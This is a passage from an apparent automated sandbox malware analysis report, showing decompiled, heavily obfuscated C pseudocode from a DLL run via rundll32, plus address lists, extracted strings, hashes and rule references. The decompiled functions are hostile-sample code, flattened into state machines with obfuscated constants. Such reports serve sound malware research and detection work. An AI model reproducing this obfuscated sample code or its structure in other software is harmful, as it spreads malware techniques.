				_v60 = _v60 ^ 0x7aeefe0c;
				_v32 = 0x4b40;
				_v32 = _v32 | 0xeeafeffc;
				_v32 = _v32 ^ 0xeeafdeae;
				_v64 = 0x4668;
				_v64 = _v64 * 0x6f;
				_v64 = _v64 ^ 0xe0078dbd;
				_v64 = _v64 * 0x44;
				_v64 = _v64 ^ 0x86a699ab;
				while(1) {
					L1:
					_t324 = 0x1977fc9;
					while(1) {
						L2:
						do {
							L3:
							while(_t385 != 0xf81c5a) {
								if(_t385 == _t324) {
									 *((intOrPtr*)(_t384 + 0x34)) = _t336;
									_t326 =  *0x1002140c; // 0x0
									 *((intOrPtr*)(_t384 + 0x2c)) = _t326;
									 *0x1002140c = _t384;
									return _t326;
								}
								if(_t385 == 0xc8bb539) {
									_t381 =  *((intOrPtr*)(_t384 + 0x18));
									_t327 = E1001178A(_v40,  *((intOrPtr*)(_t384 + 0x18)), _v76);
									_t389 =  &(_t389[1]);
									 *((intOrPtr*)(_t384 + 4)) = _t327;
									__eflags = _t327;
									_t352 = 0x1ca685a6;
									_t324 = 0x1977fc9;
									_t385 =  !=  ? 0x1ca685a6 : 0xf81c5a;
									continue;
								}
								if(_t385 == 0x14151e4e) {
									_push(_t352);
									_t354 = 0x3c;
									_t330 = E1000A0AD(_t354, _t381);
									_t384 = _t330;
									__eflags = _t384;
									if(__eflags == 0) {
										return _t330;
									}
									_t385 = 0x28ea39ca;
									while(1) {
										L1:
										_t324 = 0x1977fc9;
										L2:
										goto L3;
									}
								}
								if(_t385 == 0x145958cd) {
									return E100033F4(_v4, _v60, _v32, _v64, _t384);
								}
								if(_t385 == _t352) {
									_t381 = _v8;
									_t332 = E1000366D(_v8, _v12, _t352, _t384, _v16, _v84, _t352, _v88, _v20, _t352, E10018721);
									_t389 =  &(_t389[0xa]);
									 *((intOrPtr*)(_t384 + 0x30)) = _t332;
									__eflags = _t332;
									_t324 = 0x1977fc9;
									_t385 =  !=  ? 0x1977fc9 : 0xf81c5a;
									goto L2;
								}
								_t398 = _t385 - 0x28ea39ca;
								if(_t385 != 0x28ea39ca) {
									goto L18;
								}
								_push(_t352);
								_t381 = _v116;
								_t333 = E1001C92D(_v56, _v116, _t398, _v24, _v28, _t388);
								_t389 =  &(_t389[4]);
								 *((intOrPtr*)(_t384 + 0x18)) = _t333;
								if(_t333 == 0) {
									_t385 = 0x145958cd;
								} else {
									E10008DE6(_v104,  *((intOrPtr*)(_t384 + 0x18)), _v108,  *((intOrPtr*)(_t384 + 0x18)), _v112);
									_t381 =  *((intOrPtr*)(_t384 + 0x18));
									E1000447F( *((intOrPtr*)(_t384 + 0x18)), _v96, _v48, _v100);
									_t389 =  &(_t389[7]);
									_t385 = 0xc8bb539;
								}
								goto L1;
							}
							_t381 = _v72;
							E1001EEC8(_v68, _v72, _v36,  *((intOrPtr*)(_t384 + 0x18)));
							_t385 = 0x145958cd;
							_t324 = 0x1977fc9;
							_t352 = 0x1ca685a6;
							L18:
							__eflags = _t385 - 0x35817520;
						} while (__eflags != 0);
						return _t324;
					}
				}
			}

0x10010082
0x10010085
0x10010095
0x10010097
0x1001009d
0x1001009f
0x100100a4
0x100100af
0x100100b4
0x100100b7
0x100100bb
0x100100c3
0x100100cb
0x100100db
0x100100df
0x100100e7
0x100100ef
0x100100fc
0x100100ff
0x10010103
0x10010108
0x10010110
0x10010118
0x10010120
0x1001012d
0x10010131
0x10010139
0x10010141
0x10010149
0x10010151
0x10010159
0x10010161
0x10010169
0x10010171
0x10010179
0x10010181
0x10010189
0x10010196
0x10010199
0x100101a5
0x100101ad
0x100101b0
0x100101b4
0x100101bc
0x100101c4
0x100101cc
0x100101d4
0x100101dc
0x100101e4
0x100101ec
0x100101f4
0x100101fc
0x10010201
0x10010209
0x10010211
0x10010219
0x10010223
0x1001022b
0x10010233
0x1001023b
0x10010249
0x1001024e
0x10010254
0x1001025c
0x10010264
0x1001026c
0x10010278
0x1001027d
0x10010283
0x1001028b
0x10010297
0x1001029c
0x100102a2
0x100102aa
0x100102b2
0x100102ba
0x100102c7
0x100102ca
0x100102ce
0x100102d3
0x100102db
0x100102eb
0x100102ef
0x100102f4
0x100102f9
0x10010301
0x1001030c
0x10010317
0x10010322
0x1001032a
0x10010332
0x1001033a
0x10010342
0x1001034a
0x10010352
0x1001035a
0x10010362
0x10010366
0x1001036e
0x10010376
0x1001037e
0x10010387
0x1001038a
0x1001038e
0x10010396
0x1001039e
0x100103a3
0x100103ab
0x100103b3
0x100103bb
0x100103c0
0x100103c8
0x100103d0
0x100103d8
0x100103e2
0x100103e6
0x100103ee
0x100103f6
0x100103fe
0x1001040b
0x1001040f
0x10010417
0x10010422
0x1001042a
0x10010435
0x10010442
0x10010446
0x1001044e
0x10010456
0x1001045e
0x10010466
0x1001046e
0x10010476
0x10010483
0x10010487
0x10010494
0x10010498
0x100104a0
0x100104a0
0x100104a0
0x100104a5
0x100104a5
0x100104aa
0x00000000
0x100104aa
0x100104b8
0x1001064c
0x1001064f
0x10010654
0x10010657
0x00000000
0x10010657
0x100104c4
0x100105d0
0x100105d7
0x100105dc
0x100105df
0x100105e2
0x100105e9
0x100105ee
0x100105f3
0x00000000
0x100105f3
0x100104d0
0x100105ae
0x100105b1
0x100105b2
0x100105b7
0x100105ba
0x100105bc
0x10010664
0x10010664
0x100105c2
0x100104a0
0x100104a0
0x100104a0
0x100104a5
0x00000000
0x100104a5
0x100104a0
0x100104dc
0x00000000
0x10010647
0x100104e4
0x10010580
0x10010587
0x1001058c
0x1001058f
0x10010592
0x10010599
0x1001059e
0x00000000
0x1001059e
0x100104e6
0x100104ec
0x00000000
0x00000000
0x100104f2
0x100104fc
0x10010504
0x10010509
0x1001050c
0x10010511
0x10010553
0x10010513
0x10010529
0x1001053a
0x10010541
0x10010546
0x10010549
0x10010549
0x00000000
0x10010511
0x10010602
0x1001060a
0x10010611
0x10010616
0x1001061b
0x10010620
0x10010620
0x10010620
0x00000000
0x100104aa
0x100104a5

Strings

K4, xrefs: 10010108
Z;=, xrefs: 10010159
y, xrefs: 10010233
@K, xrefs: 1001045E
=j, xrefs: 100103A3
Dy, xrefs: 10010376
c], xrefs: 1001042A
hF, xrefs: 10010476
h$j:, xrefs: 1001044E
PV, xrefs: 100101C4
;g, xrefs: 10010264
P, xrefs: 100102DB

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Z;=$;g$=j$@K$Dy$K4$PV$P$c]$h$j:$hF$y
API String ID: 0-1527654613
Opcode ID: 542785fb7c9ecf7c5ff941129f069573306ef2ab524dfc28d564bbbed1d89b34
Instruction ID: 18ac78bdc653febc5e00c907d05f213acdfeca206d341e7f363a4662bf967d28
Opcode Fuzzy Hash: 542785fb7c9ecf7c5ff941129f069573306ef2ab524dfc28d564bbbed1d89b34
Instruction Fuzzy Hash: FCE120B16083809FE358CF25C58A90BBBF2FBC4748F108A1DF6959A2A0D7B5D945CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10014602, Relevance: 15.3, Strings: 12, Instructions: 307
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E10014602() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				unsigned int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				short* _t341;
				void* _t350;
				intOrPtr _t358;
				void* _t360;
				intOrPtr _t368;
				intOrPtr _t370;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int* _t412;

				_t412 =  &_v1172;
				_v1164 = 0xfaa1;
				_v1164 = _v1164 | 0xb80d3309;
				_t360 = 0x32e3ec2d;
				_v1164 = _v1164 << 0xa;
				_v1164 = _v1164 + 0xffffa51a;
				_v1164 = _v1164 ^ 0x37ee0f7b;
				_v1068 = 0x7562;
				_v1068 = _v1068 | 0xf02935bd;
				_v1068 = _v1068 ^ 0xf0293a89;
				_v1140 = 0x1bd5;
				_v1140 = _v1140 >> 3;
				_v1140 = _v1140 ^ 0x977d7a12;
				_v1140 = _v1140 >> 2;
				_v1140 = _v1140 ^ 0x25df4bdc;
				_v1120 = 0x8c0e;
				_v1120 = _v1120 | 0xc1c9d746;
				_v1120 = _v1120 ^ 0xd9032006;
				_v1120 = _v1120 ^ 0x18cabc26;
				_v1096 = 0x10dc;
				_v1096 = _v1096 | 0xbbdd3eff;
				_v1096 = _v1096 ^ 0xbbdd5284;
				_v1072 = 0xd785;
				_v1072 = _v1072 * 0x27;
				_v1072 = _v1072 + 0xffffbc70;
				_v1072 = _v1072 ^ 0x0020c1ba;
				_v1048 = 0x67e3;
				_v1048 = _v1048 | 0x9a26d352;
				_v1048 = _v1048 ^ 0x9a26ed16;
				_v1104 = 0xdcd4;
				_v1104 = _v1104 + 0xffff68be;
				_t401 = 0x70;
				_v1104 = _v1104 / _t401;
				_v1104 = _v1104 ^ 0x00006a4e;
				_v1080 = 0xbf13;
				_v1080 = _v1080 ^ 0x9fc50963;
				_t402 = 9;
				_v1080 = _v1080 / _t402;
				_v1080 = _v1080 ^ 0x11c0b55f;
				_v1112 = 0xd0fb;
				_v1112 = _v1112 << 1;
				_t403 = 0x6b;
				_v1112 = _v1112 * 0x77;
				_v1112 = _v1112 ^ 0x00c22c1a;
				_v1148 = 0x734c;
				_v1148 = _v1148 + 0xa091;
				_v1148 = _v1148 + 0x2bf5;
				_v1148 = _v1148 + 0xffff28ef;
				_v1148 = _v1148 ^ 0x000029d1;
				_v1088 = 0xe21d;
				_v1088 = _v1088 / _t403;
				_v1088 = _v1088 >> 7;
				_v1088 = _v1088 ^ 0x00003ba3;
				_v1044 = 0x7a53;
				_t404 = 0x68;
				_v1044 = _v1044 / _t404;
				_v1044 = _v1044 ^ 0x000035bb;
				_v1156 = 0x4348;
				_v1156 = _v1156 * 0x59;
				_v1156 = _v1156 + 0x5b76;
				_v1156 = _v1156 ^ 0xcd710e39;
				_v1156 = _v1156 ^ 0xcd66c997;
				_v1132 = 0x5da1;
				_v1132 = _v1132 << 5;
				_t405 = 0x44;
				_v1132 = _v1132 / _t405;
				_v1132 = _v1132 ^ 0x0000348d;
				_v1056 = 0xe4b;
				_t406 = 0x6d;
				_v1056 = _v1056 * 0x4e;
				_v1056 = _v1056 ^ 0x00041cb7;
				_v1160 = 0xb99b;
				_v1160 = _v1160 ^ 0x7610c841;
				_v1160 = _v1160 + 0xffff03fc;
				_v1160 = _v1160 * 0x75;
				_v1160 = _v1160 ^ 0xf510ce03;
				_v1168 = 0x2616;
				_v1168 = _v1168 + 0xffffa9ab;
				_v1168 = _v1168 * 0x34;
				_v1168 = _v1168 | 0xa34b38d0;
				_v1168 = _v1168 ^ 0xffff5163;
				_v1064 = 0x98d5;
				_v1064 = _v1064 >> 0xe;
				_v1064 = _v1064 ^ 0x000044d6;
				_v1172 = 0x8a91;
				_v1172 = _v1172 >> 6;
				_v1172 = _v1172 >> 1;
				_v1172 = _v1172 * 0x6b;
				_v1172 = _v1172 ^ 0x00000150;
				_v1092 = 0x576c;
				_v1092 = _v1092 ^ 0x6fde2eaf;
				_v1092 = _v1092 / _t406;
				_v1092 = _v1092 ^ 0x0106eb93;
				_v1060 = 0x167;
				_v1060 = _v1060 << 0xf;
				_v1060 = _v1060 ^ 0x00b3d1a7;
				_v1084 = 0xc57a;
				_v1084 = _v1084 + 0xffff7c6b;
				_v1084 = _v1084 | 0x725d64a4;
				_v1084 = _v1084 ^ 0x725d3f89;
				_v1100 = 0x1cba;
				_v1100 = _v1100 ^ 0x1194e006;
				_v1100 = _v1100 + 0xb3f9;
				_v1100 = _v1100 ^ 0x11958509;
				_v1076 = 0x5c86;
				_v1076 = _v1076 + 0xffffc7d3;
				_t407 = 0x31;
				_v1076 = _v1076 * 0x76;
				_v1076 = _v1076 ^ 0x00108d2c;
				_v1124 = 0xed37;
				_v1124 = _v1124 | 0x74f81dfd;
				_v1124 = _v1124 << 0xe;
				_v1124 = _v1124 ^ 0x3f7f8624;
				_v1052 = 0xad0c;
				_v1052 = _v1052 | 0xbeb51f76;
				_v1052 = _v1052 ^ 0xbeb5a6b6;
				_v1152 = 0x8e32;
				_v1152 = _v1152 | 0xd1dc055f;
				_v1152 = _v1152 / _t407;
				_v1152 = _v1152 << 4;
				_v1152 = _v1152 ^ 0x44868f68;
				_v1128 = 0xc6e9;
				_v1128 = _v1128 << 4;
				_t408 = 0x12;
				_v1128 = _v1128 / _t408;
				_v1128 = _v1128 ^ 0x0000d0d4;
				_v1136 = 0xad4f;
				_v1136 = _v1136 >> 5;
				_t409 = 0x71;
				_v1136 = _v1136 * 0x6c;
				_v1136 = _v1136 ^ 0x4dd37baf;
				_v1136 = _v1136 ^ 0x4dd149fa;
				_v1144 = 0x5881;
				_v1144 = _v1144 / _t409;
				_v1144 = _v1144 + 0xffff9405;
				_v1144 = _v1144 ^ 0xf27e8950;
				_v1144 = _v1144 ^ 0x0d813bbd;
				_v1108 = 0x465a;
				_v1108 = _v1108 ^ 0x07f57ac3;
				_v1108 = _v1108 << 2;
				_v1108 = _v1108 ^ 0x1fd48a8f;
				_v1116 = 0xf248;
				_v1116 = _v1116 * 0x6e;
				_v1116 = _v1116 + 0x62e2;
				_v1116 = _v1116 ^ 0x00682691;
				while(_t360 != 0x2f49899) {
					if(_t360 == 0xb45fef5) {
						_push(_t360);
						E10001909(_v1160, _v1168,  &_v1040, _v1064, _v1172);
						E10011E63( &_v1040, _v1092, _v1060, _v1160,  &_v1040, _v1084);
						E1001DD80( &_v520, _v1100, __eflags,  &_v1040, _v1076);
						_t412 =  &(_t412[0xb]);
						_t360 = 0x2f49899;
						continue;
					} else {
						if(_t360 == 0x10160131) {
							_push(_v1048);
							_push(_v1072);
							_push(_v1096);
							_t350 = E1000B871(0x10001574, _v1120, __eflags);
							_t368 =  *0x10021fd8; // 0x0
							_t370 =  *0x10021fd8; // 0x0
							E1000487B(_v1080, __eflags, _t370 + 0x1c, _v1112, _v1148, _t350,  &_v520, _t370 + 0x1c, _v1088, _t368 + 0x22c);
							E1000717B(_v1044, _v1156, _v1132, _t350, _v1056);
							_t412 =  &(_t412[0xe]);
							_t360 = 0xb45fef5;
							continue;
						} else {
							if(_t360 == 0x2d20b96b) {
								E1001E9A2();
								goto L9;
							} else {
								if(_t360 == 0x3298324c) {
									_t358 = E100038E1();
									L9:
									_t360 = 0x10160131;
									continue;
								} else {
									if(_t360 == 0x32e3ec2d) {
										_t358 =  *0x10021fd8; // 0x0
										_t360 =  !=  ? 0x2d20b96b : 0x3298324c;
										continue;
									}
								}
							}
						}
					}
					L14:
					__eflags = _t360 - 0x17bd0795;
					if(__eflags != 0) {
						continue;
					}
					return _t358;
				}
				_t341 = E100040A7(_v1124,  &_v520, _v1052, _v1152, _v1128);
				__eflags = 0;
				 *_t341 = 0;
				E1001629F(_v1136, _v1144, _v1108, _v1116,  &_v520);
				_t412 =  &(_t412[6]);
				_t360 = 0x17bd0795;
				goto L14;
			}

0x10014602
0x1001460c
0x10014616
0x1001461e
0x10014623
0x10014628
0x10014630
0x10014638
0x10014640
0x10014648
0x10014650
0x10014658
0x1001465d
0x10014665
0x1001466a
0x10014672
0x1001467a
0x10014682
0x1001468a
0x10014692
0x1001469a
0x100146a2
0x100146aa
0x100146b7
0x100146bb
0x100146c3
0x100146cb
0x100146d6
0x100146e1
0x100146ec
0x100146f4
0x10014702
0x10014707
0x1001470d
0x10014715
0x1001471d
0x10014729
0x1001472e
0x10014734
0x1001473c
0x10014744
0x1001474d
0x10014750
0x10014754
0x1001475c
0x10014764
0x1001476c
0x10014774
0x1001477c
0x10014784
0x10014794
0x10014798
0x1001479d
0x100147a5
0x100147b7
0x100147ba
0x100147c1
0x100147cc
0x100147d9
0x100147dd
0x100147e7
0x100147ef
0x100147f7
0x100147ff
0x1001480a
0x1001480f
0x10014815
0x1001481d
0x10014830
0x10014833
0x1001483a
0x10014845
0x1001484d
0x10014855
0x10014862
0x10014866
0x1001486e
0x10014876
0x10014883
0x10014887
0x1001488f
0x10014897
0x100148a2
0x100148aa
0x100148b5
0x100148bd
0x100148c2
0x100148cb
0x100148cf
0x100148d7
0x100148df
0x100148ef
0x100148f3
0x100148fb
0x10014906
0x1001490e
0x10014919
0x10014921
0x10014929
0x10014931
0x10014939
0x10014941
0x10014949
0x10014951
0x10014959
0x10014961
0x1001496e
0x1001496f
0x10014973
0x1001497b
0x10014983
0x1001498b
0x10014990
0x10014998
0x100149a3
0x100149ae
0x100149b9
0x100149c1
0x100149cf
0x100149d3
0x100149d8
0x100149e0
0x100149e8
0x100149f5
0x100149fa
0x10014a00
0x10014a0d
0x10014a1a
0x10014a29
0x10014a2a
0x10014a2e
0x10014a36
0x10014a3e
0x10014a4c
0x10014a50
0x10014a58
0x10014a60
0x10014a68
0x10014a70
0x10014a78
0x10014a7d
0x10014a85
0x10014a92
0x10014a96
0x10014a9e
0x10014aa6
0x10014ab8
0x10014b8d
0x10014ba9
0x10014bcb
0x10014bea
0x10014bef
0x10014bf2
0x00000000
0x10014abe
0x10014ac0
0x10014b05
0x10014b11
0x10014b15
0x10014b1d
0x10014b22
0x10014b3f
0x10014b5f
0x10014b7b
0x10014b80
0x10014b83
0x00000000
0x10014ac2
0x10014ac4
0x10014afe
0x00000000
0x10014ac6
0x10014ac8
0x10014aed
0x10014af2
0x10014af2
0x00000000
0x10014aca
0x10014ad0
0x10014ad6
0x10014ae4
0x00000000
0x10014ae4
0x10014ad0
0x10014ac8
0x10014ac4
0x10014ac0
0x10014c45
0x10014c45
0x10014c4b
0x00000000
0x00000000
0x10014c5b
0x10014c5b
0x10014c16
0x10014c1b
0x10014c1d
0x10014c38
0x10014c3d
0x10014c40
0x00000000

Strings

lW, xrefs: 100148D7
7, xrefs: 1001497B
ZF, xrefs: 10014A68
-2, xrefs: 10014ACA
-2, xrefs: 1001461E
b, xrefs: 10014A96
g, xrefs: 100146CB
Sz, xrefs: 100147A5
Ls, xrefs: 1001475C
v[, xrefs: 100147DD
Nj, xrefs: 1001470D
bu, xrefs: 10014638

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -2$-2$7$Ls$Nj$Sz$ZF$bu$lW$v[$b$g
API String ID: 0-1557431968
Opcode ID: b625c1121b15bec7127fcec265d387309ec9c431b26a0ef602fb4b8548f83cd8
Instruction ID: 71f2a86daa195aea84b49e69bdd8e3b172f45336256d30768c62f2c7bcddde74
Opcode Fuzzy Hash: b625c1121b15bec7127fcec265d387309ec9c431b26a0ef602fb4b8548f83cd8
Instruction Fuzzy Hash: CAF102715087809FE368CF65C589A4BBBE1FBC4748F108A1DF1D98A260DBB59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001CF07, Relevance: 15.3, Strings: 12, Instructions: 259
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1001CF07() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				unsigned int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				void* _t287;
				void* _t290;
				void* _t291;
				void* _t292;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				intOrPtr _t303;
				intOrPtr _t305;
				intOrPtr _t312;
				intOrPtr _t315;
				void* _t340;
				signed int* _t344;

				_t344 =  &_v1168;
				_v1044 = _v1044 & 0x00000000;
				_v1048 = 0x449aea;
				_v1116 = 0xf52a;
				_v1116 = _v1116 + 0xffff4f42;
				_v1116 = _v1116 * 0x52;
				_t340 = 0x214f6a8a;
				_v1116 = _v1116 ^ 0x0015c370;
				_v1056 = 0x724c;
				_v1056 = _v1056 + 0xffffba51;
				_v1056 = _v1056 ^ 0x00003664;
				_v1168 = 0xb100;
				_v1168 = _v1168 << 0xf;
				_v1168 = _v1168 ^ 0x6a85a1e7;
				_v1168 = _v1168 + 0xccb4;
				_v1168 = _v1168 ^ 0x32064a4a;
				_v1148 = 0xc86e;
				_v1148 = _v1148 + 0x7d26;
				_v1148 = _v1148 >> 2;
				_v1148 = _v1148 >> 4;
				_v1148 = _v1148 ^ 0x000056b0;
				_v1108 = 0xc2ec;
				_t297 = 0x78;
				_v1108 = _v1108 * 0x13;
				_v1108 = _v1108 >> 0x10;
				_v1108 = _v1108 ^ 0x0000766a;
				_v1152 = 0x66ad;
				_v1152 = _v1152 | 0xbdde3f53;
				_v1152 = _v1152 + 0xe170;
				_v1152 = _v1152 ^ 0xbddf4a1e;
				_v1084 = 0x9d82;
				_v1084 = _v1084 >> 0xe;
				_v1084 = _v1084 ^ 0x00007fa7;
				_v1092 = 0x1a;
				_v1092 = _v1092 >> 2;
				_v1092 = _v1092 ^ 0x0790e138;
				_v1092 = _v1092 ^ 0x0790c6a3;
				_v1160 = 0x2e77;
				_v1160 = _v1160 | 0xb15e0fed;
				_v1160 = _v1160 + 0xffff2387;
				_v1160 = _v1160 >> 0xc;
				_v1160 = _v1160 ^ 0x000b41bb;
				_v1100 = 0x8e54;
				_v1100 = _v1100 / _t297;
				_t298 = 0x41;
				_v1100 = _v1100 / _t298;
				_v1100 = _v1100 ^ 0x00005337;
				_v1072 = 0x7fbe;
				_v1072 = _v1072 << 1;
				_v1072 = _v1072 ^ 0x000088ca;
				_v1136 = 0xaf97;
				_v1136 = _v1136 | 0x542e23d9;
				_t299 = 0x47;
				_v1136 = _v1136 / _t299;
				_v1136 = _v1136 ^ 0x80e52c35;
				_v1136 = _v1136 ^ 0x81cad30d;
				_v1144 = 0xbb33;
				_v1144 = _v1144 * 9;
				_v1144 = _v1144 << 5;
				_v1144 = _v1144 ^ 0x1509c625;
				_v1144 = _v1144 ^ 0x15db0997;
				_v1080 = 0x5160;
				_v1080 = _v1080 * 0x34;
				_v1080 = _v1080 ^ 0x0010be50;
				_v1104 = 0x4b35;
				_v1104 = _v1104 << 3;
				_v1104 = _v1104 | 0x20cca2f4;
				_v1104 = _v1104 ^ 0x20ce91c2;
				_v1164 = 0xc399;
				_t300 = 0x7f;
				_v1164 = _v1164 * 0x44;
				_v1164 = _v1164 >> 0xc;
				_v1164 = _v1164 + 0xb0a5;
				_v1164 = _v1164 ^ 0x0000dad8;
				_v1060 = 0xbcb;
				_v1060 = _v1060 >> 0xa;
				_v1060 = _v1060 ^ 0x000011b7;
				_v1076 = 0x5804;
				_v1076 = _v1076 >> 7;
				_v1076 = _v1076 ^ 0x000023e9;
				_v1088 = 0x1a2b;
				_v1088 = _v1088 | 0x1fdb5617;
				_v1088 = _v1088 ^ 0x1fdb0be3;
				_v1132 = 0x5dd3;
				_v1132 = _v1132 / _t300;
				_v1132 = _v1132 + 0xffff5dfa;
				_t301 = 0x42;
				_v1132 = _v1132 / _t301;
				_v1132 = _v1132 ^ 0x03e0f830;
				_v1156 = 0xf3dd;
				_v1156 = _v1156 >> 0xe;
				_v1156 = _v1156 + 0x9bcf;
				_v1156 = _v1156 ^ 0x0000c0d0;
				_v1096 = 0xae0f;
				_v1096 = _v1096 + 0x7977;
				_v1096 = _v1096 + 0xffff7728;
				_v1096 = _v1096 ^ 0x0000da83;
				_v1052 = 0x5ff7;
				_v1052 = _v1052 + 0x1b7e;
				_v1052 = _v1052 ^ 0x00002a01;
				_v1112 = 0x248b;
				_v1112 = _v1112 >> 0xf;
				_v1112 = _v1112 << 0xf;
				_v1112 = _v1112 ^ 0x000031e5;
				_v1068 = 0x51d8;
				_v1068 = _v1068 * 0x6e;
				_v1068 = _v1068 ^ 0x00231aec;
				_v1140 = 0x5cd3;
				_v1140 = _v1140 | 0x9f102ac6;
				_v1140 = _v1140 + 0xfdb;
				_v1140 = _v1140 << 9;
				_v1140 = _v1140 ^ 0x211d03e9;
				_v1124 = 0x3433;
				_v1124 = _v1124 + 0xffffe976;
				_v1124 = _v1124 << 3;
				_v1124 = _v1124 ^ 0x00009721;
				_v1120 = 0xa5de;
				_v1120 = _v1120 + 0x645d;
				_v1120 = _v1120 + 0xffffa195;
				_v1120 = _v1120 ^ 0x0000be1f;
				_v1064 = 0x94a0;
				_v1064 = _v1064 ^ 0x9505fb93;
				_v1064 = _v1064 ^ 0x95054cbe;
				_v1128 = 0xa337;
				_v1128 = _v1128 + 0xffff010f;
				_v1128 = _v1128 >> 9;
				_v1128 = _v1128 + 0x5b24;
				_v1128 = _v1128 ^ 0x0080782c;
				E1001072D();
				do {
					while(_t340 != 0x6fdb8c1) {
						if(_t340 == 0x214f6a8a) {
							_t340 = 0x6fdb8c1;
							continue;
						}
						if(_t340 == 0x2a634c36) {
							_push(_v1076);
							_push(_v1060);
							_push(_v1164);
							_t291 = E1000B871(0x100015e4, _v1104, __eflags);
							_t292 = E10013B73();
							_t312 =  *0x10021fd8; // 0x0
							_t315 =  *0x10021fd8; // 0x0
							E1001BD2C(_t292, __eflags, _t291, _v1096, _t315 + 0x1c,  &_v1040, _v1052, _t312 + 0x22c, 0x104, _v1112);
							_t290 = E1000717B(_v1068, _v1140, _v1124, _t291, _v1120);
							_t344 =  &(_t344[0xe]);
							_t340 = 0x2f6e10c0;
							continue;
						}
						_t350 = _t340 - 0x2f6e10c0;
						if(_t340 != 0x2f6e10c0) {
							goto L10;
						}
						return E1001DD80( &_v520, _v1064, _t350,  &_v1040, _v1128);
					}
					_push(_v1108);
					_push(_v1148);
					_push(_v1168);
					_t287 = E1000B871(0x10001574, _v1056, __eflags);
					_t303 =  *0x10021fd8; // 0x0
					_t305 =  *0x10021fd8; // 0x0
					__eflags = _t305 + 0x1c;
					E1000487B(_v1084, _t305 + 0x1c, _t305 + 0x1c, _v1092, _v1160, _t287,  &_v520, _t305 + 0x1c, _v1100, _t303 + 0x22c);
					_t290 = E1000717B(_v1072, _v1136, _v1144, _t287, _v1080);
					_t344 =  &(_t344[0xe]);
					_t340 = 0x2a634c36;
					L10:
					__eflags = _t340 - 0x25b1cad2;
				} while (__eflags != 0);
				return _t290;
			}

0x1001cf07
0x1001cf0d
0x1001cf14
0x1001cf1c
0x1001cf24
0x1001cf35
0x1001cf39
0x1001cf3e
0x1001cf46
0x1001cf51
0x1001cf5c
0x1001cf67
0x1001cf6f
0x1001cf74
0x1001cf7c
0x1001cf84
0x1001cf8c
0x1001cf94
0x1001cf9c
0x1001cfa1
0x1001cfa6
0x1001cfae
0x1001cfbd
0x1001cfc0
0x1001cfc4
0x1001cfc9
0x1001cfd1
0x1001cfd9
0x1001cfe1
0x1001cfe9
0x1001cff1
0x1001cff9
0x1001cffe
0x1001d006
0x1001d00e
0x1001d013
0x1001d01b
0x1001d023
0x1001d02b
0x1001d033
0x1001d03b
0x1001d040
0x1001d048
0x1001d058
0x1001d060
0x1001d065
0x1001d06b
0x1001d073
0x1001d07b
0x1001d07f
0x1001d087
0x1001d08f
0x1001d09b
0x1001d09e
0x1001d0a2
0x1001d0aa
0x1001d0b2
0x1001d0bf
0x1001d0c3
0x1001d0c8
0x1001d0d0
0x1001d0d8
0x1001d0e5
0x1001d0eb
0x1001d0f3
0x1001d0fb
0x1001d100
0x1001d108
0x1001d110
0x1001d11f
0x1001d122
0x1001d126
0x1001d12b
0x1001d133
0x1001d13b
0x1001d146
0x1001d14e
0x1001d159
0x1001d161
0x1001d166
0x1001d16e
0x1001d176
0x1001d17e
0x1001d186
0x1001d196
0x1001d19a
0x1001d1a6
0x1001d1a9
0x1001d1ad
0x1001d1b5
0x1001d1c5
0x1001d1ca
0x1001d1d2
0x1001d1da
0x1001d1e2
0x1001d1ea
0x1001d1f2
0x1001d1fa
0x1001d205
0x1001d210
0x1001d21b
0x1001d223
0x1001d228
0x1001d22d
0x1001d235
0x1001d242
0x1001d246
0x1001d24e
0x1001d256
0x1001d25e
0x1001d266
0x1001d26b
0x1001d273
0x1001d27b
0x1001d283
0x1001d288
0x1001d290
0x1001d298
0x1001d2a0
0x1001d2a8
0x1001d2b0
0x1001d2b8
0x1001d2c0
0x1001d2c8
0x1001d2d0
0x1001d2d8
0x1001d2dd
0x1001d2e5
0x1001d2f1
0x1001d305
0x1001d305
0x1001d313
0x1001d3dc
0x00000000
0x1001d3dc
0x1001d31b
0x1001d34e
0x1001d357
0x1001d35e
0x1001d366
0x1001d375
0x1001d37e
